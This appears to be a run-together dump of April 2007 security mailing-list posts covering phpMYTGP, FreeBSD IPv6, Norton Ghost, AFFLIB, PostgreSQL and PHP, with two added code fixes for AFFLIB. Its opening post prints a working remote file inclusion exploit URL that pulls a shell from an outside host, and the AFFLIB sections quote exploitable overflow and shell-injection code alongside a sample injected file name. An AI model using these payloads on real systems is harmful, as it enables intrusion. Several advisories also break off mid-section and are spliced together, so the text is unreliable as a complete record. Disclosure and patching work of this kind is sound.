phpMYTGP v1.4b RFI

+++
name/version: phpMYTGP v1.4b
vendor: www.allthescripts.com/page-207.htm
by: www.hackerz.ir userz, s3rv3r_hack3r, saeid_only_linux, farzad
exploit: http://victim/addvip.php?msetstr[PROGSDIR]=http://shell
+++
FreeBSD Security Advisory FreeBSD-SA-07:03.ipv6

=============================================================================
FreeBSD-SA-07:03.ipv6                                       Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 Routing Header 0 is dangerous

Category:       core
Module:         ipv6
Announced:      2007-04-26
Credits:        Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino
Affects:        All FreeBSD releases.
Corrected:      2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE)
                2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4)
                2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16)
                2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE)
                2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12)
CVE Name:       CVE-2007-2242

I.   Background

IPv6 provides a routing header option which allows a packet sender to
indicate how the packet should be routed, overriding the routing knowledge
present in a network. This functionality is roughly equivalent to the
source routing option in IPv4. All nodes in an IPv6 network -- both routers
and hosts -- are required by RFC 2640 to process such headers.

II.  Problem Description

There is no mechanism for preventing IPv6 routing headers from being used
to route packets over the same link(s) many times.

III. Impact

An attacker can amplify a denial of service attack against a link between
two vulnerable hosts; that is, by sending a small volume of traffic the
attacker can consume a much larger amount of bandwidth between the two
vulnerable hosts.

An attacker can use vulnerable hosts to concentrate a denial of service
attack against a victim host or network; that is, a set of packets sent
over a period of 30 seconds or more could be constructed such that they all
arrive at the victim within a period of 1 second or less.

Other attacks may also be possible.

IV.  Workaround

No workaround is available.

V.   Solution

NOTE WELL: The solution described below causes IPv6 type 0 routing headers
to be ignored. Support for IPv6 type 0 routing headers can be re-enabled if
required by setting the newly added net.inet6.ip6.rthdr0_allowed sysctl to
a non-zero value.

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1, and
6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch
# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch / Path                                                    Revision
-------------------------------------------------------------------------
RELENG_5
  src/sys/netinet6/in6.h                                          1.35.2.5
  src/sys/netinet6/in6_proto.c                                    1.29.2.5
  src/sys/netinet6/route6.c                                       1.10.4.2
RELENG_5_5
  src/UPDATING                                              1.342.2.35.2.12
  src/sys/conf/newvers.sh                                    1.62.2.21.2.14
  src/sys/netinet6/in6.h                                      1.35.2.3.2.1
  src/sys/netinet6/in6_proto.c                                1.29.2.4.2.1
  src/sys/netinet6/route6.c                                   1.10.4.1.4.1
RELENG_6
  src/sys/netinet6/in6.h                                          1.36.2.8
  src/sys/netinet6/in6_proto.c                                    1.32.2.6
  src/sys/netinet6/route6.c                                       1.11.2.2
RELENG_6_2
  src/UPDATING                                               1.416.2.29.2.7
  src/sys/conf/newvers.sh                                     1.69.2.13.2.7
  src/sys/netinet6/in6.h                                      1.36.2.7.2.1
  src/sys/netinet6/in6_proto.c                                1.32.2.5.2.1
  src/sys/netinet6/route6.c                                   1.11.2.1.4.1
RELENG_6_1
  src/UPDATING                                              1.416.2.22.2.18
  src/sys/conf/newvers.sh                                    1.69.2.11.2.18
  src/sys/netinet6/in6.h                                      1.36.2.6.2.1
  src/sys/netinet6/in6_proto.c                                1.32.2.4.2.1
  src/sys/netinet6/route6.c                                   1.11.2.1.2.1
-------------------------------------------------------------------------

VII. References
iDefense Security Advisory 04.26.07: Symantec Norton Ghost 10 Service Manager Buffer Overflow Vulnerability

Symantec Norton Ghost 10 Service Manager Buffer Overflow Vulnerability

iDefense Security Advisory 04.26.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 26, 2007

I. BACKGROUND

Symantec Norton Ghost is a backup and recovery application designed to
allow users to completely restore their systems to previous snapshots.
More information can be found on the vendor's site at the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=br&pvid=ghost10

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in Norton Ghost could
allow local attackers to run code as the SYSTEM level user.

Norton Ghost Service Manager is a Local Server COM object that allows
privileged Ghost Backup Operators the ability to take and restore Ghost
images of the system. A function within the Service Manager can be used to
trigger a buffer overflow by supplying an overly long string.

III. ANALYSIS

Exploitation allows local attackers to execute code as the SYSTEM level
user. In order to be able to exploit this vulnerability, attackers must
have tasking privileges for the Norton Ghost Service Manager.

IV. DETECTION

iDefense verified the existence of this vulnerability on Norton Ghost 10.0.
Other versions may be vulnerable as well.

V. WORKAROUND

iDefense recommends limiting which users have permission to interact with
the Ghost Service Manager. Ghost provides a means to grant specific users
access to these features.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability with a software update. The
update is available via their LiveUpdate channels. For more information,
consult their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2007.04.26.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/02/2007  Initial vendor notification
01/09/2007  Initial vendor response
04/26/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Pravus.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in any
other medium other than electronically, please e-mail [EMAIL PROTECTED] for
permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author nor
the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
iDefense Security Advisory 04.26.07: Symantec Norton Ghost 10 Recovery Points Insecure Password Storage Vulnerability

Symantec Norton Ghost 10 Recovery Points Insecure Password Storage Vulnerability

iDefense Security Advisory 04.26.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 26, 2007

I. BACKGROUND

Symantec Norton Ghost is a backup and recovery application designed to
allow users to completely restore their systems to previous snapshots.
More information can be found on the vendor's site at the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=br&pvid=ghost10

II. DESCRIPTION

Norton Ghost allows administrators and other power users to schedule
snapshots of local disks for backup and recovery purposes. If these
recovery points are set to save to a remote network share, Ghost will
prompt the user to enter a user name and password for the share.

Password information entered into Ghost for this purpose is encrypted and
saved to the local file system in the application's home directory, which
has read access allowed for all users. The encryption key used by Ghost to
decrypt these stored credentials is derived from the MD5 hash of the plain
text user name stored in the configuration file. Since every user on the
system has read access to these configuration files, any user can decrypt
the stored passwords.

III. ANALYSIS

This vulnerability is the result of insecure encryption utilization plus
insecure file permissions. In order for this exploit to have an impact,
administrators would either have to configure client machines to save
restore point images to a private share, or the vulnerable machine would
have to be shared by several users who each saved their restore point
images to private shares.

IV. DETECTION

iDefense verified the existence of this vulnerability on Norton Ghost 10.0.
Other versions may be vulnerable as well.

V. WORKAROUND

If your current backup policy is vulnerable to this exploit scenario, one
possible workaround is to configure client machines to save images to user
network shares so that the configuration files only contain the individual
user's network credentials.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability with a software update. The
update is available via their LiveUpdate channels. For more information,
consult their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2007.04.26.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/02/2007  Initial vendor notification
03/21/2007  Second vendor notification
03/22/2007  Initial vendor response
04/26/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Pravus.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in any
other medium other than electronically, please e-mail [EMAIL PROTECTED] for
permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author nor
the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
Security Concerns in Web 2.0

Hi,

I did get a chance to submit a paper on security concerns in Web 2.0. This
paper has been published by OWASP now and is available at the links below:

PDF version:  http://www.owasp.org/index.php/Category:OWASP_Papers
HTML version: http://www.owasp.org/index.php/OWASP_Papers/Jeopardy_in_Web_2_0

Happy reading !!! Please feel free to drop in your comments about the
paper. You can mail me at dharmeshmm_at_gmail_com

Wregs,
Dharmesh M Mehta
http://smartsecurity.blogspot.com
AFFLIB(TM): Multiple Buffer Overflows

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Buffer Overflows Discovered in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0 and likely earlier
     Severity: High
       Author: Timothy D. Morgan <tmorgan {at} vsecurity {dot} com>
Vendor Status: Vendor Notified, Fix Available
CVE Candidate: CVE-2007-2053
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-overflows.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:

From the forensicswiki.org website[1]:

  The Advanced Forensics Format (AFF) is an extensible open format for the
  storage of disk images and related forensic metadata. It was developed by
  Simson Garfinkel and Basis Technology.

AFFLIB(TM) is the reference implementation of the AFF(TM) format, written
primarily by Simson Garfinkel. It comes in the form of an open source
library and a set of command line tools used to manipulate AFF(TM) files.

Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool assessment
process. As a result, multiple vulnerabilities of varying severities were
discovered. The most significant of these vulnerabilities are being
announced publicly to raise awareness and help end-users secure themselves
against potential attack.

Multiple buffer overflows were found in AFFLIB(TM) which could allow an
attacker to create a denial-of-service condition against a forensics
examiner, or possibly to execute arbitrary code on behalf of a victim. One
such overflow may be triggered remotely and may be relatively easy to
exploit.

The other overflows identified appear to have medium to low severity, due
to the low likelihood of an attacker having the ability to influence the
vulnerable operations, at least in the typical use case scenarios. However,
because AFFLIB(TM) is in part a library, other applications may utilize it
in unanticipated ways, which may expose these attack vectors.

All identified overflows were fixed in version 2.2.6. All line numbers
listed below are from version 2.2.0.

Vulnerability Details:

The following sections include detailed descriptions of the most severe
overflows found during the assessment.

* Remote Stack-based Buffer Overflow Through Use of LastModified *

File: lib/s3.cpp
Line: 113

The LastModified string is copied to a fixed-length buffer using strcpy(3),
but no length checking is apparently done when it is originally read from
an XML response. This could allow a malicious Amazon S3 server or a
man-in-the-middle to execute code on the S3 client system. (See [2] for
more details on the Amazon S3 protocol.)

Lines 111-115 illustrate the problem:

    /* Make date nice */
    char tstamp[64];
    strcpy(tstamp,(*i)->LastModified.c_str());
    tstamp[10] = ' ';
    tstamp[19] = '\000';

Note that the (*i)->LastModified string is drawn directly from an XML
response in the endElement() callback function (lines 173-178 of
lib/s3_glue.cpp):

    case 3:
        if(!strcmp(name,"Key")){einfo->lbr->contents.back()->Key = einfo->cbuf; break;}
        if(!strcmp(name,"LastModified")){einfo->lbr->contents.back()->LastModified = einfo->cbuf;break;}
        if(!strcmp(name,"ETag")){ einfo->lbr->contents.back()->ETag = einfo->cbuf;break;}
        if(!strcmp(name,"Size")){ einfo->lbr->contents.back()->Size = atoi(einfo->cbuf.c_str());break;}
        break;

An exploit of this would require that users decide to run the s3 binary
program against an untrustworthy S3 server, or that an attacker were able
to conduct impersonation or man-in-the-middle attacks against the
communications between the user and a valid S3 server. Since the s3 binary
uses non-SSL HTTP connections by default, this may not be difficult.

* Stack-based Buffer Overflows in S3 URL Parsing *

File: lib/vnode_s3.cpp
Lines: 80 81

Description:

A portion of a potentially untrustworthy parameter is copied into a buffer
without sufficient length checking in a memcpy() call, which writes to a
stack-based buffer. If this function receives URLs from an untrusted
source, code execution would be a major risk.

Lines 66-81 are included below for illustration:

    /* Separate out the bucket and the path */
    const char *fn = af_filename(af);
    regex_t re;
    if(regcomp(&re,"^s3://([^/]*)/(.*)$",REG_EXTENDED)){
        err(1,"regcomp");
    }
    regmatch_t match[3];
    memset(match,0,sizeof(match));
    if(regexec(&re,fn,3,match,0)!=0){
        return -1;      // can't parse URL; must not be a match
    }
    char bucket[1024]; memset(bucket,0,sizeof(bucket));
    char path[1024];   memset(path,0,sizeof(path));
    memcpy(bucket,fn+match[1].rm_so,match[1].rm_eo-match[1].rm_so);
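A bounds-checked replacement for the strcpy() at lib/s3.cpp:113, written for this page as an added example (not AFFLIB's code or VSR's): it rejects a LastModified value that would not fit in the 64-byte buffer, and also one too short for the two in-place patches at offsets 10 and 19 that the original performs unconditionally. The function name and the "YYYY-MM-DDTHH:MM:SS" shape check are assumptions; the sample values are constructed.

```c
/* Added example, not AFFLIB's code. The original (lib/s3.cpp:111-115) is:
 *     char tstamp[64];
 *     strcpy(tstamp,(*i)->LastModified.c_str());   // unbounded copy
 *     tstamp[10] = ' ';
 *     tstamp[19] = '\000';
 * LastModified comes straight from the S3 XML response, so its length is
 * server-controlled. This version bounds the scan and validates the shape
 * before touching any fixed offset. */
#include <stdio.h>
#include <string.h>

#define TSTAMP_LEN 64        /* same size as char tstamp[64] in the original */
#define TSTAMP_MIN_INPUT 20  /* offsets 10 and 19 are patched in place */

/* Writes "YYYY-MM-DD HH:MM:SS" into out (out must hold TSTAMP_LEN bytes).
 * Returns 0 on success, -1 if the input is NULL, would not fit, is too
 * short for the offsets being patched, or does not look like an S3
 * "YYYY-MM-DDTHH:MM:SS..." timestamp (assumed shape). */
int format_s3_timestamp(const char *last_modified, char out[TSTAMP_LEN])
{
    if (last_modified == NULL || out == NULL)
        return -1;

    /* Bounded length scan: never reads past TSTAMP_LEN bytes of input,
     * so an oversized or unterminated value is rejected, not copied. */
    size_t n = 0;
    while (n < TSTAMP_LEN && last_modified[n] != '\0')
        n++;
    if (n >= TSTAMP_LEN)         /* would overflow char tstamp[64] */
        return -1;
    if (n < TSTAMP_MIN_INPUT)    /* tstamp[19] would lie past the data */
        return -1;

    /* The in-place patches assume ISO 8601 layout; check it first. */
    if (last_modified[4] != '-' || last_modified[7] != '-' ||
        last_modified[10] != 'T' || last_modified[13] != ':' ||
        last_modified[16] != ':')
        return -1;

    memcpy(out, last_modified, n + 1);   /* n + 1 <= TSTAMP_LEN */
    out[10] = ' ';                       /* "2007-04-26T12..." -> "2007-04-26 12..." */
    out[19] = '\0';                      /* drop fractional seconds and 'Z' */
    return 0;
}

int main(void)
{
    char out[TSTAMP_LEN];

    /* Constructed well-formed value, as an S3 listing would carry it. */
    if (format_s3_timestamp("2007-04-26T12:34:56.000Z", out) == 0)
        printf("ok:       %s\n", out);

    /* Constructed oversized value: rejected instead of overflowing. */
    char big[200];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("oversize: %s\n", format_s3_timestamp(big, out) == -1 ? "rejected" : "accepted");

    /* Constructed short value: rejected instead of patching past the data. */
    printf("short:    %s\n", format_s3_timestamp("2007-04-26", out) == -1 ? "rejected" : "accepted");
    return 0;
}
```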
[USN-454-1] PostgreSQL vulnerability

===========================================================
Ubuntu Security Notice USN-454-1              April 26, 2007
postgresql-8.1, postgresql-8.2 vulnerability
CVE-2007-2138
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  postgresql-8.1                  8.1.9-0ubuntu0.6.06

Ubuntu 6.10:
  postgresql-8.1                  8.1.9-0ubuntu0.6.10

Ubuntu 7.04:
  postgresql-8.2                  8.2.4-0ubuntu0.7.04

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

PostgreSQL did not handle the search_path configuration option in a
secure way for functions declared as SECURITY DEFINER. Previously, an
attacker could override functions and operators used by the security
definer function to execute arbitrary SQL commands with the privileges
of the user who created the security definer function. The updated
version does not search the temporary table schema for functions and
operators any more.

Similarly, an attacker could put forged tables into the temporary table
schema to trick the security definer function into using attacker
defined data for processing. This was possible because the temporary
schema was always implicitly searched first before all other entries in
search_path. The updated version now supports explicit placement of the
temporary schema.

Please see the HTML documentation or the manual page for CREATE FUNCTION
for details and an example of how to write security definer functions in
a secure way.
Updated packages for Ubuntu 6.06 LTS:
AFFLIB(TM): Multiple Shell Metacharacter Injections

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0-2.2.8 and likely earlier versions
     Severity: Medium to Low
       Author: Timothy D. Morgan <tmorgan {at} vsecurity {dot} com>
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2055
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:

From the forensicswiki.org website[1]:

  The Advanced Forensics Format (AFF) is an extensible open format for the
  storage of disk images and related forensic metadata. It was developed by
  Simson Garfinkel and Basis Technology.

AFFLIB(TM) is the reference implementation of the AFF(TM) format, written
primarily by Simson Garfinkel. It comes in the form of an open source
library and a set of command line tools used to manipulate AFF(TM) files.

Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool assessment
process. As a result, multiple vulnerabilities of varying severities were
discovered. The most significant of these vulnerabilities are being
announced publicly to raise awareness and help end-users secure themselves
against potential attack.

VSR found that user-supplied command line parameters were used in several
popen() calls without validation or escaping. The attack vectors available
are limited, which reduces the overall severity of these problems. These
vulnerabilities remain exploitable in the latest release (2.2.8), even
though an attempt was made to check for a set of shell metacharacters.

All line numbers listed below are from version 2.2.0.

Vulnerability Details:

The following sections include detailed descriptions of the specific
instances of shell metacharacter injection found during the assessment.

* Shell Command Injections in Decompression Calls *

File: tools/afconvert.cpp
Lines: 245 255
Platforms Affected: Unix

Description:

A command line parameter is used without validation or escaping in a
popen() call. If this command (or this function) receives parameters from
an untrusted source, code execution would be a major risk.

Lines 240-257 are included below for illustration:

    /* Check to see if it is a gzip file... */
    if(probe_gzip(infile) && yesno("infile looks like a gzip file","Uncompress it","Uncompressing")){
        /* Open with a subprocess. We will need to use zlib when we move to Windows. */
        char buf[256];
        sprintf(buf,"gzcat %s",infile);
        a_in = af_popen(buf,"r");
    }

    /* Check to see if it is a bzip2 file... */
    if(!a_in && probe_bzip2(infile) && yesno("infile looks like a bzip2 file","Uncompress it","Uncompressing")){
        /* Open with a subprocess. We will need to use bzip2zlib when we move to Windows. */
        char buf[256];
        sprintf(buf,"bzcat %s",infile);
        a_in = af_popen(buf,"r");
    }

Since af_popen() ultimately uses the popen() system call, and infile comes
directly from a command line parameter, command line special characters
could be injected if an attacker could control the input.

* Shell Command Injection in Unused get_parameter Function *

File: aimage/ident.cpp
Line: 190
Platforms Affected: Unix

Description:

A function parameter is used without validation or escaping in a popen()
call. If this function (get_parameter) received arguments from an
untrusted source, code execution would be a major risk. This function does
not appear to be called at this time.

Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following timeline
outlines the responses from the vendor regarding this issue:

2007-04-01 - Vendor provided details of all vulnerabilities identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple security
             fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
             remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed
             in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
             notify VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected
             version 2.2.8 and found that no additional vulnerabilities
             were fixed. VSR advisories published.
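An argv-based replacement for the sprintf()+popen() pattern at tools/afconvert.cpp:245 and :255, added here as an example (not AFFLIB's code): the decompressor is started with fork()/execvp() so the file name reaches it as one literal argument and no shell ever parses it, which is why a metacharacter blacklist like the one the advisory says was attempted in 2.2.8 is not needed. The helper names are assumptions; the stand-alone run uses echo in place of gzcat to show a constructed file name containing ';' being echoed back verbatim rather than interpreted.

```c
/* Added example, not AFFLIB's code. The original pattern is:
 *     sprintf(buf,"gzcat %s",infile);  a_in = af_popen(buf,"r");
 * popen() hands buf to /bin/sh -c, so ';', '`', '$(...)', '|' and friends
 * in infile become shell syntax. Passing an argument vector to execvp()
 * removes the shell from the path entirely. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv[0] (resolved via PATH) with argv as its literal argument vector
 * and capture its stdout into out (NUL-terminated, truncated at out_len-1).
 * Returns the child's exit status, or -1 on a setup or wait failure. */
int run_argv_capture(char *const argv[], char *out, size_t out_len)
{
    int fds[2];
    if (out_len == 0 || pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: stdout -> pipe, then exec. No shell is involved, so the
         * arguments are delivered byte-for-byte to the program. */
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0)
            _exit(127);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                       /* exec failed */
    }

    /* Parent: read until EOF, which arrives when the child exits. */
    close(fds[1]);
    size_t used = 0;
    for (;;) {
        if (used + 1 >= out_len) {        /* buffer full: drain, don't store */
            char sink[256];
            if (read(fds[0], sink, sizeof sink) <= 0)
                break;
            continue;
        }
        ssize_t r = read(fds[0], out + used, out_len - 1 - used);
        if (r <= 0)
            break;
        used += (size_t)r;
    }
    out[used] = '\0';
    close(fds[0]);

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What the afconvert call becomes: decompress infile with "gzcat" or
 * "bzcat" via an argument vector instead of a format string. Assumed
 * helper, not the library's API. A file name beginning with '-' should
 * still be guarded (e.g. prefixed with "./") so the tool does not read it
 * as an option; that is an argument-parsing concern, not a shell one. */
int decompress_to_buffer(const char *tool, const char *infile,
                         char *out, size_t out_len)
{
    char *argv[] = { (char *)tool, (char *)infile, NULL };
    return run_argv_capture(argv, out, out_len);
}

int main(void)
{
    /* Constructed file name carrying shell metacharacters. Through popen()
     * the text after ';' would have run as a second command; here it is
     * just part of one argument. echo stands in for gzcat. */
    char out[256];
    int rc = decompress_to_buffer("echo", "image.aff; echo INJECTED", out, sizeof out);
    printf("exit=%d stdout=%s", rc, out);
    return rc == 0 ? 0 : 1;
}
```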
TSLSA-2007-0015 - postgresql

--------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2007-0015

Package names:     postgresql
Summary:           Multiple vulnerabilities
Date:              2007-04-27
Affected versions: Trustix Secure Linux 2.2
                   Trustix Secure Linux 3.0
                   Trustix Secure Linux 3.0.5
                   Trustix Operating System - Enterprise Server 2
--------------------------------------------------------------------------

Package description:

  postgresql
  PostgreSQL is an advanced Object-Relational database management system
  (DBMS) that supports almost all SQL constructs (including transactions,
  subselects and user-defined types and functions). The postgresql package
  includes the client programs and libraries that you'll need to access a
  PostgreSQL DBMS server. These PostgreSQL client programs are programs
  that directly manipulate the internal structure of PostgreSQL databases
  on a PostgreSQL server. These client programs can be located on the same
  machine with the PostgreSQL server, or may be on a remote machine which
  accesses a PostgreSQL server over a network connection. This package
  contains the docs in HTML for the whole package, as well as command-line
  utilities for managing PostgreSQL databases on a PostgreSQL server.

Problem description:

  postgresql < TSL 3.0.5 > < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - New upstream.
  - SECURITY Fix: A vulnerability has been identified, which could be
    exploited by malicious users to obtain elevated privileges. This issue
    is caused by insecure search_path settings, which could be exploited by
    unprivileged users to gain the SQL privileges of the owner of any
    SECURITY DEFINER function they are allowed to call.

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CVE-2007-2138 to this issue.

Action:

  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.

Location:

  All Trustix Secure Linux updates are available from
  <URI:http://http.trustix.org/pub/trustix/updates/>
  <URI:ftp://ftp.trustix.org/pub/trustix/updates/>

About Trustix Secure Linux:

  Trustix Secure Linux is a small Linux distribution for servers. With
  focus on security and stability, the system is painlessly kept safe and
  up to date from day one using swup, the automated software updater.

Automatic updates:

  Users of the SWUP tool can enjoy having updates automatically installed
  using 'swup --upgrade'.

Questions?

  Check out our mailing lists:
  <URI:http://www.trustix.org/support/>

Verification:

  This advisory along with all Trustix packages are signed with the TSL
  sign key. This key is available from:
  <URI:http://www.trustix.org/TSL-SIGN-KEY>

  The advisory itself is available from the errata pages at
  <URI:http://www.trustix.org/errata/trustix-2.2/>
  <URI:http://www.trustix.org/errata/trustix-3.0/> and
  <URI:http://www.trustix.org/errata/trustix-3.0.5/>
  or directly at
  <URI:http://www.trustix.org/errata/2007/0015/>

MD5sums of the packages:
[USN-455-1] PHP vulnerabilities

===========================================================
Ubuntu Security Notice USN-455-1              April 27, 2007
php5 vulnerabilities
CVE-2007-1375, CVE-2007-1376, CVE-2007-1380, CVE-2007-1484,
CVE-2007-1521, CVE-2007-1583, CVE-2007-1700, CVE-2007-1718,
CVE-2007-1824, CVE-2007-1887, CVE-2007-1888, CVE-2007-1900
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libapache2-mod-php5             5.1.2-1ubuntu3.7
  php5-cgi                        5.1.2-1ubuntu3.7
  php5-cli                        5.1.2-1ubuntu3.7
  php5-sqlite                     5.1.2-1ubuntu3.7

Ubuntu 6.10:
  libapache2-mod-php5             5.1.6-1ubuntu2.4
  php5-cgi                        5.1.6-1ubuntu2.4
  php5-cli                        5.1.6-1ubuntu2.4
  php5-sqlite                     5.1.6-1ubuntu2.4

Ubuntu 7.04:
  libapache2-mod-php5             5.2.1-0ubuntu1.1
  php5-cgi                        5.2.1-0ubuntu1.1
  php5-cli                        5.2.1-0ubuntu1.1
  php5-sqlite                     5.2.1-0ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Stefan Esser discovered multiple vulnerabilities in the Month of PHP bugs.

The substr_compare() function did not sufficiently verify its length
argument. This might be exploited to read otherwise inaccessible memory,
which might lead to information disclosure. (CVE-2007-1375)

The shared memory (shmop) functions did not verify resource types, thus
they could be called with a wrong resource type that might contain user
supplied data. This could be exploited to read and write arbitrary memory
addresses of the PHP interpreter. This issue does not affect Ubuntu 7.04.
(CVE-2007-1376)

The php_binary handler of the session extension was missing a boundary
check. When unserializing overly long variable names this could be
exploited to read up to 126 bytes of memory, which might lead to
information disclosure. (CVE-2007-1380)

The internal array_user_key_compare() function, as used for example by the
PHP function uksort(), incorrectly handled memory unreferencing of its
arguments. This could have been exploited to execute arbitrary code with
the privileges of the PHP interpreter, and thus circumventing any
disable_functions, open_basedir, or safe_mode restrictions. (CVE-2007-1484)

The session_regenerate_id() function did not properly clean up the former
session identifier variable. This could be exploited to crash the PHP
interpreter, possibly also remotely. (CVE-2007-1521)

Under certain conditions mb_parse_str() could cause the register_globals
configuration option to become permanently enabled. This opened an attack
vector for a large and common class of vulnerabilities. (CVE-2007-1583)

The session extension did not set the correct reference count value for
the session variables. By unsetting _SESSION and HTTP_SESSION_VARS (or
tricking a PHP script into doing that) this could be exploited to execute
arbitrary code with the privileges of the PHP interpreter. This issue does
not affect Ubuntu 7.04. (CVE-2007-1700)

The mail() function did not correctly escape control characters in
multiline email headers. This could be remotely exploited to inject
arbitrary email headers. (CVE-2007-1718)

The php_stream_filter_create() function had an off-by-one buffer overflow
in the handling of wildcards. This could be exploited to remotely crash
the PHP interpreter. This issue does not affect Ubuntu 7.04.
(CVE-2007-1824)

When calling sqlite_udf_decode_binary() with special arguments, a buffer
overflow happened. Depending on the application this could be locally or
remotely exploited to execute arbitrary code with the privileges of the
PHP interpreter. (CVE-2007-1887 CVE-2007-1888)

